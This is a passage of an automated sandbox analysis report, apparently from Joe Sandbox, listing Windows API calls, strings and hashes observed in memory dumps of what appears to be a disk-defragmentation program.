                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CreateErrorLastMutex
                                                                                                                                                                                                                                                                                    • String ID: {4391F12D-936B-4037-9383-DCB800DF7B65}
                                                                                                                                                                                                                                                                                    • API String ID: 1925916568-3123431990
                                                                                                                                                                                                                                                                                    • Opcode ID: 091c4e7f644ce8bd6197cdb533c163e751dc47d35b49d56a391d01d6980858d1
                                                                                                                                                                                                                                                                                    • Instruction ID: ec8680d88669c7631082afe2fce56944a0d96bb555ced3f370f40cb7f6e8cb2a
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 091c4e7f644ce8bd6197cdb533c163e751dc47d35b49d56a391d01d6980858d1
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 32D05E343003019BEB646B30CC9539A35A0AB40742FE0887EF01FE46D0EA6CD5D49A09

                                                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                                                    Function 006091B0 Relevance: 1.4, APIs: 1, Instructions: 133COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,?), ref: 0060926D
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000003.2342650370.00000000005D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_3_5d0000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                                    • Opcode ID: de148ecc26438995122263fd84e79d06e7e20828183585f1ddfda33d16eac7f6
                                                                                                                                                                                                                                                                                    • Instruction ID: 902ea12ca2a8b9ed67c7dd2cdb2c025495265744e63fc664879fcf873e36f5e2
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: de148ecc26438995122263fd84e79d06e7e20828183585f1ddfda33d16eac7f6
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41518D71A4424ADFCF45CF98C991AEEBBF2EF09314F284095E465F7282C234AA51DF64
                                                                                                                                                                                                                                                                                    Function 006092CC Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129memoryCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 00609314
                                                                                                                                                                                                                                                                                      • Part of subcall function 00609098: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 006090C1
                                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 00609366
                                                                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(0000002C,?,00000040,0000002C), ref: 006093C0
                                                                                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,?), ref: 006093F3
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000003.2342650370.00000000005D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_3_5d0000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Virtual$Alloc$FreeProtect
                                                                                                                                                                                                                                                                                    • String ID: ,
                                                                                                                                                                                                                                                                                    • API String ID: 980677596-3772416878
                                                                                                                                                                                                                                                                                    • Opcode ID: 846e80d9192284de11e110977aaee4205ca63ec1a267e246cbf1a7208dcc7df3
                                                                                                                                                                                                                                                                                    • Instruction ID: 738af253e33fc2844edb25ff7b5a8cc7bc7a71a48a5dee11789a4da4251f10ed
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 846e80d9192284de11e110977aaee4205ca63ec1a267e246cbf1a7208dcc7df3
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C951F875940609AFCB24DFA9C881ADFBBF9FF08344F10851AF959A7281D370E951CBA4
                                                                                                                                                                                                                                                                                    Function 00600BA2 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000003.2342650370.00000000005D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_3_5d0000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: __freea$__alloca_probe_16
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3509577899-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 4e897855b1c91e27b5b3822bf0bfb6303626a7a146d8b7883a30a41037c14f16
                                                                                                                                                                                                                                                                                    • Instruction ID: 827714dbcdcd14d99d3e51517cca221d75a07404051d043b83e984966f2d593b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e897855b1c91e27b5b3822bf0bfb6303626a7a146d8b7883a30a41037c14f16
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C516E72640606AFFB299EA4CC85FEB7BAAEF45710F150129FD08962D1EB30ED508660
                                                                                                                                                                                                                                                                                    Function 00601748 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,006012D6,00000001,00000364,00000000,?,000000FF,?,006044E3,?,?,00000000), ref: 00601789
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000003.2342650370.00000000005D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_3_5d0000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                    • Opcode ID: ee48cdcd52c4b806542326aadda53ed618c04df8f8a6fc717b050504461e197c
                                                                                                                                                                                                                                                                                    • Instruction ID: c9542868706a0b26f0befe5ef7ec36d79098caa58275dbf31f89df352360f859
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ee48cdcd52c4b806542326aadda53ed618c04df8f8a6fc717b050504461e197c
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B1F0E9316C02356BDB6E2A229C55BAB374BDF837B0B198016FC08DE2D0EB70DC0486E4
                                                                                                                                                                                                                                                                                    Function 00603D41 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • LCMapStringEx.KERNELBASE(?,00600C92,?,?,-00000008,?,00000000,00000000,00000000,00000000,00000000), ref: 00603D75
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000003.2342650370.00000000005D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_3_5d0000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: String
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2568140703-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 0945d66e0fc2f7f49b1f81aa2a293dc726ff8842d5d07da23efdc00a5881f432
                                                                                                                                                                                                                                                                                    • Instruction ID: 740aec800bbd3e0fb76d046b126ff8390ddaf2ff82bd4ff66e6689982e7aeed7
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0945d66e0fc2f7f49b1f81aa2a293dc726ff8842d5d07da23efdc00a5881f432
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1AF09D3644022ABBCF165F91DC19DDE3F2BEF48761F098115FA18652A0C732C971EB90
                                                                                                                                                                                                                                                                                    Function 005FBEFA Relevance: 1.3, APIs: 1, Instructions: 86COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(?,00000000,?), ref: 005FBFCE
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000003.2342650370.00000000005D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_3_5d0000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 42e18fdff2272388e3abfa12b665a75fca2b4c47cf89466845bbaf97ee75eff6
                                                                                                                                                                                                                                                                                    • Instruction ID: e70edae92fdbffabaaba60a6755b8701382e4f5cba9e763386f9103fb5502931
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 42e18fdff2272388e3abfa12b665a75fca2b4c47cf89466845bbaf97ee75eff6
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C311675D00209EFDB10CFA9DC90BAEBFF5BB49700F14902AE655A7250D775A904CFA4
                                                                                                                                                                                                                                                                                    Function 005FBC80 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(00000000), ref: 005FBCC7
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000003.2342650370.00000000005D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_3_5d0000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                    • Opcode ID: b37e437db9babc49ae3a4f1b2521bdd3b518e7ba0ebdf2ed44f89321ffd0326e
                                                                                                                                                                                                                                                                                    • Instruction ID: 030da3c3227afd8d4ea6e01ef0ce71907682b02e1b5281fd6f05bfe7084934fc
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b37e437db9babc49ae3a4f1b2521bdd3b518e7ba0ebdf2ed44f89321ffd0326e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C7E06DB5A01617BBA3227B20DD19DBB7A6DFF99742309842AF900E2240DF24DD01C6B1
                                                                                                                                                                                                                                                                                    Function 00609098 Relevance: 1.3, APIs: 1, Instructions: 30memoryCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 006090C1
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000003.2342650370.00000000005D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_3_5d0000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 5fa5c9145237fa88e1aa37702aad2718761a025d2b836103e406ca8614d22d44
                                                                                                                                                                                                                                                                                    • Instruction ID: e0a3c4391ce4dc5eb8148b91bd9264e555e35f2c9cedfedefd59b9bde2fcb326
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5fa5c9145237fa88e1aa37702aad2718761a025d2b836103e406ca8614d22d44
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A01C471D40249EFEB04CF95C449BAEBBB1AB14326F108059E521AA2D2C3B85A86DF94

                                                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                                                    Function 0041A06D Relevance: 49.3, APIs: 14, Strings: 14, Instructions: 276COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: -BootTimeDefrag$-InstallNative$-UninstallNative$8<$8F$DiskDefrag$Foucs_Color$Frame_Color$Mid_Back_Color$SeBackupPrivilege$SeRestorePrivilege$Select_Color$Text_Color$Window
                                                                                                                                                                                                                                                                                    • API String ID: 0-3120907903
                                                                                                                                                                                                                                                                                    • Opcode ID: f21249918f5851e3c0eb3fa1878fc82d2d878186d22415210d092e86f6f25f0a
                                                                                                                                                                                                                                                                                    • Instruction ID: 85c3a5c4530a51ec5ffbaea33e836eab6d3034a11df18fab6eaffee292debf54
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f21249918f5851e3c0eb3fa1878fc82d2d878186d22415210d092e86f6f25f0a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1CA19570644341ABD320EB61DC86FEF77A4AF84704F10891EF54992281DBB9E5988B6F
                                                                                                                                                                                                                                                                                    Function 0041FAB0 Relevance: 49.3, APIs: 7, Strings: 21, Instructions: 275windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(00000000,00000000,00000001), ref: 0041FAF6
                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(00000000,00000001,00000001,?), ref: 0041FB49
                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(00000000,00000002,00000001,?), ref: 0041FB9C
                                                                                                                                                                                                                                                                                    • GetSubMenu.USER32(00000000,00000000), ref: 0041FBC3
                                                                                                                                                                                                                                                                                    • GetSubMenu.USER32(00000000,00000001), ref: 0041FD14
                                                                                                                                                                                                                                                                                    • GetSubMenu.USER32(?,00000000), ref: 0041FD7A
                                                                                                                                                                                                                                                                                    • GetSubMenu.USER32(00000000,00000002), ref: 0041FE06
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Menu$InfoItem
                                                                                                                                                                                                                                                                                    • String ID: $0$3401008$3401009$3401010$3401011$3401012$3401013$3401014$3401015$3401016$3401017$3401018$3401019$3401020$3401021$3401022$3401024$3401098$3401131$^H
                                                                                                                                                                                                                                                                                    • API String ID: 1040333723-558355984
                                                                                                                                                                                                                                                                                    • Opcode ID: 57bab4f1923334ec470cd56f5efcc3a9a6a283e0eb4f594bc954c30004842149
                                                                                                                                                                                                                                                                                    • Instruction ID: 83c1616b1d25a5f5e88f9c25e0e2a21432fc20987b46dd7eda8cdac89d290607
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 57bab4f1923334ec470cd56f5efcc3a9a6a283e0eb4f594bc954c30004842149
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F7811FF0FA031036E794AAA59C53FEB31686F44B44F20C81F760EB25D5C9ACA84556ED
                                                                                                                                                                                                                                                                                    Function 00411150 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242fileCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,?,00000000,0000024C), ref: 004112A2
                                                                                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(main,DefragTime,0047D9D0,?,00000064,?), ref: 0041134A
                                                                                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(main,TotalDefraggedFileSize,0047EF74,?,00000064,?), ref: 004113FA
                                                                                                                                                                                                                                                                                    • StrFormatByteSizeW.SHLWAPI(00000000,?,?,?,00000000,?,?,?,?,?,00000000,0000024C), ref: 0041141C
                                                                                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(main,DefraggedFileCount,0047EF74,?,00000064,?), ref: 00411452
                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(?,00000010), ref: 00411474
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 00411483
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FindPrivateProfileString$File$ByteCloseFirstFormatNextSize
                                                                                                                                                                                                                                                                                    • String ID: 3401068$3401069$3401070$DefragTime$DefraggedFileCount$DG$LG$TotalDefraggedFileSize$`=$main
                                                                                                                                                                                                                                                                                    • API String ID: 295610168-2526466113
                                                                                                                                                                                                                                                                                    • Opcode ID: d1cd0ec7a8fdc8ff7367d6e0728dff8a46181e4d412615e5ddc93afe06c8e850
                                                                                                                                                                                                                                                                                    • Instruction ID: 3dc56caefaff00a374a3ee75e2b4c31a72c5442d79c66a3b7d7afc40f3bd3104
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d1cd0ec7a8fdc8ff7367d6e0728dff8a46181e4d412615e5ddc93afe06c8e850
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6691A771244340AFD320DF21CC46FAB77E8AF88B14F108A2EF65DA71D1DAB56944CB5A
                                                                                                                                                                                                                                                                                    Function 004112B7 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 147fileCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(main,DefragTime,0047D9D0,?,00000064,?), ref: 0041134A
                                                                                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(main,TotalDefraggedFileSize,0047EF74,?,00000064,?), ref: 004113FA
                                                                                                                                                                                                                                                                                    • StrFormatByteSizeW.SHLWAPI(00000000,?,?,?,00000000,?,?,?,?,?,00000000,0000024C), ref: 0041141C
                                                                                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(main,DefraggedFileCount,0047EF74,?,00000064,?), ref: 00411452
                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(?,00000010), ref: 00411474
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 00411483
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: PrivateProfileString$Find$ByteCloseFileFormatNextSize
                                                                                                                                                                                                                                                                                    • String ID: DefragTime$DefraggedFileCount$LG$TotalDefraggedFileSize$`=$main
                                                                                                                                                                                                                                                                                    • API String ID: 2174522762-3670384684
                                                                                                                                                                                                                                                                                    • Opcode ID: 637e9459b825226f02b753a8a6ecd317c3f6f5394dd561357564af9cc347cd40
                                                                                                                                                                                                                                                                                    • Instruction ID: faa287cb98b21d4df2f3e2fa49730f9b90f221f68114e230af78a147129465c0
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 637e9459b825226f02b753a8a6ecd317c3f6f5394dd561357564af9cc347cd40
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 82516271204341AFE324DB21CD45FAF77E8AB88B04F10891EF64D972D1DA74A945CB6A
                                                                                                                                                                                                                                                                                    Function 004112B9 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 147fileCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(main,DefragTime,0047D9D0,?,00000064,?), ref: 0041134A
                                                                                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(main,TotalDefraggedFileSize,0047EF74,?,00000064,?), ref: 004113FA
                                                                                                                                                                                                                                                                                    • StrFormatByteSizeW.SHLWAPI(00000000,?,?,?,00000000,?,?,?,?,?,00000000,0000024C), ref: 0041141C
